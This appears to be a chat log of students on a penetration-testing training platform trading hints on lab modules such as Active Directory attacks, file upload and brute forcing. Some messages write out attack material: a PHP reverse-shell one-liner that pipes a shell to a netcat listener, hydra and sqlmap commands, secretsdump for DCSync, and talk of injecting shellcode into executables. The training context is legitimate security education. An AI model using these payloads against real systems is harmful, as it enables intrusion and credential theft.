
what vmware are you using

the playbox or sum like that one?

i use virtualbox

is it free?

yep

maybe a dumb question but you can ping the target right?

yeah

it works too

ah ok

oracle vm virtualbox?

Yes

yep that's the one

how did you add the parrot os to it?

i don't use parrot , i just tested on the pwnbox. I use Kali from virtualbox

the in-browser parrot OS that you can spawn is the pwnbox

I am sick of this hacking thing

I'll do it tomorrow

@north rapids

gift him some NITRO

JAJAJAJAJA

thx for the heads up

yeeeeeted

I run Kali from a hyperv server on an enterprise network and rarely have issues with communication but every now and then (like 3 times) I have had to use the pwnbox to get something to work.

is hyperv nice?

i think you are the first person i've met who uses it

Actually its not bad, but to get the gui to work for RDP took some setting up. At my home I have a dedicated Dell poweredge server that I use, and I gotta say its so much faster that way lol

I only use it here because of course the memory and storage options are sooo much better on the hyperv server than my desktop

so do you have essentially a bare metal metal kali/parrot machine on your home server?

or wait

nevermind i'm stupid

wait what

whats a power edge server

Home: Dell poweredge server dual processor, with 5 TB in Raid array running Kali linux

is the kali running off virtualization software

no its installed directly

ah

ok badass

https://www.dell.com/en-us/work/shop/povw/poweredge-t550

very similar to this

At work I am running off the university servers via hyperv. Tons of memory and storage available that way, but doing everything over a vpn is kind of slow if im not on campus

Huge Flex 💪

Anyone ever seen this error? Trying to use xfreerdp from the Pwnbox:

Ok it turns out running as root was messing it up

good to know..

Hey man, have you figured it out? Could you please give me a nudge for that

DM me

Hi everybody , I am on the RDP and SOCKS Tunneling with SocksOverRDP module , when i am trying to connect to the server on the 172.16.6.155 with jason credentials , its just fall down and send me this , anyone could give me a hint ?

Can anyone help me on the ACTIVE DIRECTORY ENUMERATION & ATTACKS please?
Attacking Domain Trusts - Child -> Parent Trusts - from Linux. Perform the ExtraSids attack to compromise...

I think I compromised the machine but how to obtain the NTLM hash for the Domain Admin user bross after compromising the parent domain? really stuck on that for hours

@radiant dagger Try running secretsdump.py , i was able to authenticate with the adunn user we discovered in a previous section

I did not understand the trick challenge and what is required of me to do. Can someone guide or help me, please?

Thank you Jared, I got the flag with adunn secretdump. Although, I'm a little confusing about the intended way. it looks like the question doesn't want us to use the adunn

anyone around for a nudge on a specific LDAP query to look at GPO/password settings?

i dont know hot to set up my vpn in the server
i use kali kinux

I'm working on Password Attacks: Credential Hunting in Linux and I'm unable to brute force the initial password that's needed before the machine goes down. I've tried hydra and medusa and ftp and ssh. I've used the mutated password list and the regular password list. Could someone please DM the initial password?

I used the hint to finish footprinting easy, but what is the official way? I'm trying bruteforcing with medusa and it's pretty slow

now using hydra, couldn't fix medusa's speed in pwnbox

On the Pivoting, Tunneling skills assesment , is there any mod that I can DM ? , i think something is not working properly on the lab

Hello Guys!, finally on the last part of the hashcat module (I've enjoyed it very much ) but I don't really know how to extract the hashes from this file, maybe you could guide me a little bit so I cant get a foot on this. Thanks!

@woeful oxide DM me 🙂

hey, looking for help in the metasploit module. Im on the sessions & jobs section. I found the service which is el finder and now need to find an exploit for it, which I found, however when i run it, the session cannot be created. Can someone help?

Hi, I am looking for some guidance in FILE UPLOAD ATTACKS module; Blacklist Filters. I cant seem to find any working php payload all I get is black screen. I have checked that I am using correct extensions.

did you use x64 for the payload?

in that section you need to use a image extension to upload the payload and change the extension in burp

any help for the Broken Authentication module Skill Assessment i got the support account but don't know how to decode the cookie

I used the reverse_tcp meterpreter payload

use linux/x64/meterpreter/reverse_tcp

that payload doesnt exist for the module

what module did you use

unix/webapp/elfinder_php_connector_exiftran_cmd_injection

i don't know about that module i use ||exploit/linux/http/elfinder_archive_cmd_injection|| and the x64 meterpreter payload

yea that was the other one that showed up,but why that one over the other one? the source code of the website even talks about the service using php connector

oh I remember now it did show 2 module, i think i try try both and that one work for some reason

yea but how to know which one to use without trying both

or maybe it's possible with the module i selected?

i don't know

if metasploit show a lot of module i will do more enum and find more info about the service a want to exploit but if it show 2 or 3 i'm going to try all of them

okay, if someone knows if the other module works as well, or how to determine which to choose, please let me know. Thank you though

hi guys

How do you do that?

https://academy.hackthebox.com/vpn

Can anyone give a nudge for the sql injection fundamentals final assesment. Still stuck at the login screen.. (figured it out, for anyone stuck on this look at the cheat sheet...)

Need some serious help with the Broken Authentication - Skills Assessment, been stuck for days

Feel free to DM me

hi guys, im stuck at brute force module 'skill assessment-website' Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside? , my command was hydra -l user -P '/home/wilsonchuah/SecLists/Passwords/Leaked-Databases/rockyou.txt' -f 157.245.33.77 -s 30896 http-post-form "/admin_login.php:username=^USER^&password=^PASS^:F=<form name='log-in'" , but the estimated time is 240 hours , am i in the correct direction ?

Ah OK thanks for that I'll give it a try...👍👍👍

OK that US VPN made no difference...the credentials don't work...possibly something wrong with the module of VM?

Update: It worked with the US VPN and the credentials mentioned. The server needs about 10 hours to start up 🙄🙄🤣🤣

Hello! Someone to DM about Footprinting Lab - Medium?

in cmd?

I think it depends where you type, that's very general 😛
If you mean for example, cmd, one way I can think of is the autocomplete with [Tab] (you have to type only first letters correctly).
(Maybe someone else can give you a better answer, dunno)

@west canopy Can I DM you about the Footprinting Lab - Medium?

hey, i need help at Vulnerability Assessment to the nessus skill asesment at the first and last question, anyone who can help me?

Anyone help me with command; sed , awk, grep or such, that will remove all the words from my list that do not have any special characters

echo '!?Normal text.%' | sed 's/[[:punct:]]//g'

See also: https://www.regular-expressions.info/posixbrackets.html

How do I reverse this, where only the ones with the special characters are shown

You can DM me, if you still need help

sure

Hey All, i'm on the last question for AD Enumeration & Attacks, Skills Assessment 1: Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01. I'm running into an issue with how to go about doing the DCSync attack with the user credentials i obtained in the previous questions. Any assistance would be appreciated!

@timber tide i just used proxychains + secretsdump.py and authenticated as the ||tpetty ||user

Thanks.... i think the proxychains is the piece I'm missing

Can I DM you for some more info about that?

sure

Ah sry I have not read your question properly. If you want to output all the lines of a file (I assume you try to filter a password list), which have only non special chars in it, you have to use: cat file.txt | grep -E '^[^[:punct:]]*$'

can anyone help with a nudge on the Active Directory LDAP final section? getting stuck on identifying user privs

@boreal sun for the last question on the skill assessment, try running whoami /priv from an elevated powershell

yeah i tried that but not getting it to accept the creds for the user account

You're not the first person who i have talked to who had this issue. When i last tested it, i was able to run powershell as administrator and still do it as htb-student

ahh ok - glad it wsant just a user error. i figured that was the process, but wanted to check - just rebooted the machine and going to try that way

ty for the help mate

np 🙂

yep, can confirm that works

thanks!

sweet!

could anyone point me in the right direction on broken authentication predictable reset token? i cant figure out for the life of me why its not working

Hi averyone

how to escalate the system over application

rdp commandline errors in module. cant seem to connect to any htb sutdent

@devout bear post your command and the error

sure

xfreerdp /v:<target IP address> /u:htb-student /p:<password>

@lethal atlas Thumbprint: c7:53:c8:76:45:0c:ba:59:a8:7c:a3:f9:a5:a5:4a:55:da:1b:06:76:b8:36:e3:97:04:59:19:63:7c:a1:07:b3
The above X.509 certificate could not be verified, possibly because you do not have
the CA certificate in your certificate store, or the certificate has expired.
Please look at the OpenSSL documentation on how to add a private CA to the store.
Do you trust the above certificate? (Y/T/N)

/rank

Who are solved knowledge check on gettting started module?

and wht happens when you say yes you trust the cert?

Can someone help me, how to prevent the 'Too many login attempts' in Broken Authentication -- Skill Assessment? I'm trying the: X-Forwarded-For: 127.0.0.1 as taught in the module, but It's not working

I used burp intruder and set a long delay between attempts.

How long delay did you use ? I have quite a big list still haha

i solved it with python. I wrote a bruteforse script and set a timer after every 4 tries
time.sleep(timer)

did you find any information on the password requirements? like character types, upp/lowercase req. etc.?

Yeah I got the requirements and had some help to create a filter list

i didnt try to allow it

you have to accept the cert to continue

seems unsecure

All the message was saying is that particular certificate was not found on your system.

correct...which is new for me

ill accept it.

thx

you will get a similar message every time you connect to a new IP/HOST even with SSH.

ahh ok. thx. much appreciated

could anyone help me out with broken authentication predictable reset token? i have tried just about everything i could think of and still nothing

@lethal latch DM me 🙂

hi everyone i have been stuck on getting a foothold for a minute on getting started. from my understanding i create a php file with the below script
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.109 4444>/tmp/f"); ?>

upload it to the image section of the nibbleblog and then the use netcat to listen to the 4444 port but everytime i do it i get the same error saying its an invalid local port

is there something I am doing wrong here?

can i see your netcat command

by the way thanks for helping with this again, i swear i worked on this before coming back to ask about this again

try running as sudo

same result

try doing: nc -lvnp 4444

i don't think the order of the options should matter but worth a shot

well today we both learned it does lol

nice

I've been trying really hard on the information gathering web edition module. Frankly I find it to be the most difficult module I have done. Could I have some help with the skill assesment??

@raven cairn i got you dawg

I think a question in the module might not be working. Can someone double check???

Has anybody been able to get this question?

Hi guys, I'm currently doing the HTTP web requests module

heres a question from that module

The server above loads the flag after the page is loaded. Use the Network tab in the browser devtools to see what requests are made by the page, and find the request to the flag.

/flag_327a6c4304ad5938eaf0efb6cc3e53dc.txt

i got the flag

but it keeps saying my answer is incorrect

I think the flag is what is inside that .txt file

oooh

thanks

but this is the hint tho

Look for a request to a file called 'flag_...'. If you can't find it, refresh the page and monitor new requests.

This didn't work for me. Are you sure this works?

you can use netcraft for this question, you can find the answer in "Hosting History"

Port-scanning something you don't have permission to is usually a big no no

@raven cairn ayyyy it worked tysm

Yes typically we shouldn't be nmapping public websites or IP's

Yoooo. Thanks!

Well the module differentiates between active and passive information gathering

but it has you do active reconnaissance on other public targets i believe

i feel like using curl and using nmap aren't that different in the grand scheme of things.

Yea there's no law against port scanning so it's more like an ethical issue

as long as you aren't actively disrupting service, im sure

not to mention any company with a program would be used to people scanning them

yup. I wonder about that though, if you're testing through a popular VPN if it'll start denying service through that node. Do providers rotate their node IPs so they don't get blacklisted?

I'm guessing they would anyway, as a routine of security

Hey guys. Traffic analysis module (chapter: Interrogating Network Traffic With Capture and Display Filters)
question: What are the client and server port numbers used in first full TCP three-way handshake? (low number first then high number)
I know the answer and see that handshake (the answer consists of two ports) but it's still incorrect and I don't understand what kind of answer this question wants about.

@frigid vector DM me 🙂

considering that there are bots that exist that slowly go across the internet and scan ports i think most if not all companies IT team should be ready for some level of scanning on their public facing devices.

i think it was a Jack Rhysider video i heard about it from first. The one he talked about i believe was bots that would scan ports, find your ssh port, and then try to login with default credentials.

Can anyone help with the Metasploit module?

Specifically the 'meterpreter' lesson

Present your query, without giving much of spoiler
Don't ask to ask, just ask

My question is related to the very first part so no spoilers... I have no idea what exploit to use on what port. I have tried so many things with nothing to get me started. I have seriously tried for days

feel free to DM me any help if you can

sorry I didn't reply directly to you

DM me showing your efforts
We'll figure it out

hi, i need some help for the Broken Authentication module Skill Assessment i got the support account but don't know how to decode the cookie

Using the tools shown in the module will help you with that 😉

which one or in which section

Not 100% sure but would burp suite be the tool?

the decoder in burp?

That would be my go to, but like i said 100% have not done that specific module yet

can anyone give me a nudge wth the file upload attacks skills assessment? I have found a handful of extensions that work, I know where the uploads end up, but for the life of me, I can't do both at the same time!

hi, did you manage to find the answer for that question i'm also stuck

did you read the source code

and after you upload a file it will be renamed so make so sure you can file and read the source code for that part

I assisted him with it. Use cyberchef to decode the cookie. And make sure you are looking at the correct cookie, aka NOT the PHPSESSID cookie.

oh i'm idiot thanks

Yeah, i read the source code. I can find files that are uploaded, but not my malicious ones for some reason

did you use special character to name your payload

I did...but I changed...just reverted the box and it worked though!!

Has anyone had trouble staying connected to a target? Everytime I spawn a new target and try to navigate to it. The wait time is incredibly slow and, within ten minutes I get "unable to connect" even to a page that I was previously connected too.

some people have weird issue with the special character so try without it maybe or dm me

oh and also i'm confused in the Guessable Answers section, i'm i supposed to answer all of the unguessable questions untill i get a guessable one?

Hi Team, Need help with answers to 'Sessions' chapter within 'Using Metasploit Framework' Module. Is there any walkthrough or any other demonstration/notes ?

Yes, only 1 question should be guessable and the rest are theoretically not guessable.

So just rotate them and only seriously answer the guessable one

this place is awesome

so i rotate the unguessable questions 97 time and still don't get a guessable one which questions guessable one?

I believe it's favorite color?

This is still a problem for me...It worked once when I tried a different VPN but it no longer works...is there a general problem with this module?

stuck on the second question for conditional statments and loops of the python module
I writen the script and it works but the website won't accept my answer. code block 2

just print the variable.

what do you mean I tried the output, I tried list_2 and I tried print(list_2)

edit: print(num) works

got onto free rdp conected to an empty workstation with just a recycle bin...no drives no directories...cant answer the questions

am i missing something in the bloodhound module? im not seeing a windows instance to start for testing against - the only thing i can spawn is the pwnbox

nvm got it

looks like im also getting an invalid collector error from the .zip files provided for the module. anyone else having this issue? cant find anything on the forums forit

@boreal sun Yes, I had to use Pwnbox because the bloodhound on my VM was not compatible with their data

@boreal sun First section there is no target and they give you the data to analyze. The second section you actually connect to a target and run a collector, then analyze.

ok cool - was just checking whether it was a "follow along" or just a "read and learn" portion for the first bit

thanks mate

@hazy cradle if you still need help feel free to DM 🙂

Hi, have you been able to solve that? I'm having the same problem. I got the shell, tried several exploits for "sudo", none of them seem to work... Thanks

@west canopy do you biohk with TRT?

i take a cheque drop every morning instead of drinking coffee

@rugged stag DM me 🙂

Hi everyone I have a problem at module Web Attacks section Blind Data Exfiltration . Can someone help me ?

@golden hornet i might be able to help, DM me

ok

Am I doing this wrong? SQLMap module:
I'm getting this everytime I try to solve case #8, by using this command: sqlmap 'http://159.65.29.54:32279/case8.php' --data 'id=1&t0ken=7Y4mOvfC21UegPCj3fNcRGkWyhaY0fWVEWMszissHk' --csrf-token='t0ken' --batch

you forgot a = between data and ‘id

--data='id=1&t0ken=7Y4

Hi can anyone assist with windows privilege escalation dnsadmin section?

Read from forums that we should use msfvenom reverse payload. but the dns can't seem to start backup

Hey, I'm currently on Web Info Gathering module and i don't quite understand how do i pass Active Infrastructure Gathering with these vHosts

What am I supposed to do here, i haven't found how vHosts operate in any other sections

read up on zone transfers

@delicate drum are you on the 'Active Infrastructure Identification' section?

Yeah

have you edited your /etc/hosts?

Nope

thats it

thats definitely it

Haven't found anything about that in the module tho

it's in earlier modules, but essentially, servers that are running seperate web-apps are 'virtual hosting', providing seperate sites on the same ip, same server

Read about that, but didn't see how to setup one, or if that's even needed

Btw I'm using already built path from the academy and went thought all the modules before this one, perhaps I've missed something about them

Because the websites you are trying to access are not listed on any dns server. IE not public. you need to make an entry in your /etc/hosts file so that your OS knows where to find that name.

Oh that actually makes sense now

anyone ? ):

that is why you provide an IP and the domain name

sorry ive overwritten ur question

haha no biggie mate.

@summer lake I cant help. I havent done that module yet

@summer lake lol sry dude I haven't got that far yet

maybe if @west canopy is on he can help

I assume theres a place that can teach me how to edit my entry and get it to work

you can 'sudo cat /etc/hosts'

to see what's there

nano /etc/hosts

here is an example..

and add the ip with the corresponding domain name

thanks mates <3

👍

1 more thing, what's the format i use to access vHosts, vHost@ip or?

nope, just like a normal url

http://dev.inlanefreight.com

*.local

makes sense

gotem

fun project, you can set up a local webserver on your LAN, then you can add it to your /etc/hosts file with whatever URL you want, as it takes precedence over other DNS sources, and when you type it into your browser it will come up

that, and if you have a cloud server running somewhere, you can do the same thing, saves from having to remember the IP. You could make it "mycloudserver.me"

@summer lake this section took me several attempts and I had to respawn the target several times. I don't recall any particular trick to making it work besides working through the steps as slowly and meticulously as possible.

Ah. So the dns not restarting is kinda "normal"?

yea i ran into that

Tried it more than 10x. only worked twice with the cmd dll so far.

Alright. Thanks,! at least i'm on the right path

eventually i got a reverse shell to work

Respect your persistence tbh

Wha is going on with this academy Tunnelling and Port Forwading Module? I keep getting this after connecting to the VPN and trying to SSH to the attack host: I'm seriously considering cancelling my subscription...this is unacceptable

@paper crag which section is that? I can test on my end.

Meterpreter Tunneling & Port Forwarding...but it was the same on the previous section too...

Working fine on my end:

will try once I finally understand all of this DNS and enumerating stuff

I'm still stuck on the same module, can't find FQDN from an iP address

Have you tried dig -x ?

not sure, whatever i try i get DOMAINX error

or something along those lines

but I've tried dig any, shouldn't that do the -x too?

hmm, just remembered that whois might work for ya

heck, i don't supposed ping resolves it for ya, does it?

whois outputs thats its a private registered ip

ping doesn't respond

I might have misconfigurated something perhaps?

Which module? I'll check my notes, or just spin it up.

Web Information Gathering, Active Infrastructure Identification section

I've somehow, not even I know how managed to get some questions right, but I can't get the FQDN from those 2 IPs provided in the questions

Can someone nudge me on the "Attacking common application" module?
Stuck at tge Wordpress - Discovery & Enumeration questions.
Can't seem to find what is needed, although not enough info from the course, tried everything manually

@oblique acorn Edit: Which question are you stuck on?

any luck?

Can I have help decoding the cookie? I don't know how I am supposed to do this without help...

@raven cairn I'm not an expert, but I believe cookies are url encoded before they're sent, have you url decoded it yet?

Yes.

Cool, then since they've said its md5, and that the last character is missing, either find a tool to append the string with each alphanumerical and decode md5 until it works, or just add them on yourself and decode

you could probably also make a bash script, and use md5sum to fiddle with it

hey guys, I need help with the INFORMATION GATHERING - WEB EDITION/Active Subdomain Enumeration, in the question of the 2 ips, I try the subdomains commands but got me the NXdoamns

@mellow maple what did you use to enum?

yes but got one zone

I have a question regarding the sqlmap modules. For flag 7 I ran a command I thought would work and it didn't, i slightly altered the command and it didn't work, so naturally I ran the first command and it worked....is this normal sqlmap behavior?

SQLmap as a tool works great. It might have been a problem on your end.

I doubt it was a problem with the tool tbh

hmmmm on the pwnbox end, maybe. Just wondering if anyone has had similar behavior

I've never had that happen to me.

(Also if anybody is still here I am still suffering on the skill assesment)

Hey all, while doing a Linux module, the question is “What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?”
Now I found the correct file, but when I look at the file more closely, the size is 34266. I don’t understand how that’s the right answer, as 34266 is not smaller than 28k…. Am I missing something obvious?

I think It is using a different measuring system.

That’s probably it, when you use stat or -lisan on files it displays in bytes instead of kb right?

Actually the kb- byte thing still doesn’t account for the number

Which sqlmap commands did you ran..?

DM me we'll look into it

Need any nudge?

hi everyone, have you finished file inclusion module?

Hey guys in the Information Gathering module under the Active Infrastructure Identification, I added the hosts. on /etc/hosts

After that also the domains app.inlanefreight.local and dev.inlanefreight.local is not showing up

Can someone help me out?

Module: Using Metasploit Framework, section : Session & Jobs , The target system has an old version of Sudo running. Find the relevant exploit and get root access to the target system. Find the flag.txt file I have found relevant exploit using local_exploit_suggester, which syas that exploit/linux/local/su_login: The target appears to be vulnerable.

However, when I used that exploit, it says "[*] Exploit completed, but no session was created.
"

Could someone help?

Hey I've done that question yesterday, I can help u If ure still stuck there

I believe I had problems trying to solve it using zap

If ure using ur own vm and connecting over vpn, make sure u set ur LHOST to ur tun0 ip, not ur real ip

Done with no luck..thanks..

try changing the RPORT to something else

maybe the app is listening on a specific one

guys is it posible to inject payload into a normal .exe and then get a meterpeter shell out of it once executed?

Yeah its possible

You can inject malicious shellcode straight into legitimate binaries too

but do av softwares pick it up?

Depends

what do you mean?

depends on the software or

also, so it deosnt have to be an exploit? it can just be a reverse shell payload and work?

Yeah just search around you'll get detailed blogs and write-ups doing the same

Very helpful in windows privilege escalation

how is it more useful in priv esc rather than gaining foothold?

Maybe wrong exploit. It's not su, sudo...

We can use it in both the scenarios

Yo @mortal basin

I noticed something very very very weird about burp suite community edition while doing "Using web proxies" module,

I need to show you that stuff
Can I DM you?

@delicate drum pls be careful with spoilers...

Sure

I'm sorry, won't happen again

On the skills assessment for hacking WordPress. I've tried two methods for obtaining shell, but no luck. I'm confident Im on the right track I just can't figure out why I'm getting the errors I'm getting. Any help would be 😃

I keep getting my payload listed on the page

Anyone online who solved the Password Attacks: Password mutations? Used 3 hours bruteforcing and this is starting to feel ridiculous. The instructions seems clear, but just keep slashing at the box seems obnoxious. Anyone? 🙂

Just bruteforcing or are you using rules?

The zip comes with a password list and a rules list. Both are used, cutting dublicates. I now separatet the mut_password.list into files based on length and started with word length of 8, then 9 and now I am on 10. I feel like this is taking way too long.

Already read a hint of using ftp instead of ssh because it is faster. So I am already doing that

Got it! It is not okay that it should take this long! 😢